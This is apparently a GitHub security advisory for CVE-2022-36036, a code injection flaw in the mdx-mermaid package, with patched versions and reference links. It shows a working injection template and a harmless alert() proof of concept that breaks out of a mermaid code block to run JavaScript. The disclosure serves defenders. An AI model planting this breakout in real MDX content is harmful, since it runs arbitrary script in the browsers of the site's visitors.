[mdx-mermaid] Improper Control of Generation of Code (‘Code Injection’) in mdx-mermaid

Impact

Arbitary javascript injection

Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs

` + (function () {
  // Put Javascript code here
  return ''
}()) + `

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

References

• https://github.com/sjwall/mdx-mermaid/security/advisories/GHSA-rvgm-35jw-q628
• https://nvd.nist.gov/vuln/detail/CVE-2022-36036
• https://github.com/sjwall/mdx-mermaid/commit/f2b99386660fd13316823529c3f1314ebbcdfd2a
• https://github.com/advisories/GHSA-rvgm-35jw-q628